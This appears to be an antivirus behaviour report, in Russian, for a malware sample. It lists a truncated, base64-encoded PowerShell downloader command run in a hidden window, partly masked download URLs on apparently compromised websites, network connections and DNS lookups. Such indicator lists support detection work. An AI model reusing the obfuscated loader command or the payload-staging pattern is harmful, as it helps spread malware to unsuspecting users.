Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAdgAgACAAeAA4AFkAZQBJAFMAIAAgACgAIAAgAFsAdABZAHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHMAWQBzAHQAJwAsACcAUgBlAEMAJwAsACcAVABPAFIAeQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1197104.cvr
- 'mu####ustries.com':80
- 'bi####humibazar.com':80
- 'we####outfits.com':80
- 'pe#####lizedjigsaws.com':80
- 'hu###omains.com':443
- 'st####-thailand.org':80
- http://mu####ustries.com/wp-admin/D/
- http://bi####humibazar.com/wp-admin/D/
- http://we####outfits.com/how-much/zw2z/
- http://pe#####lizedjigsaws.com/replace_img/qG6D9T/
- http://st####-thailand.org/cgi-bin/1GKI/
- 'hu###omains.com':443
- DNS ASK mu####ustries.com
- DNS ASK bi####humibazar.com
- DNS ASK ji##ost.com
- DNS ASK fi#.#evelab.mx
- DNS ASK we####outfits.com
- DNS ASK pe#####lizedjigsaws.com
- DNS ASK hu###omains.com
- DNS ASK st####-thailand.org
- DNS ASK od##va.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAdgAgACAAeAA4AFkAZQBJAFMAIAAgACgAIAAgAFsAdABZAHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHMAWQBzAHQAJwAsACcAUgBlAEMAJwAsACcAVABPAFIAeQ...' (со скрытым окном)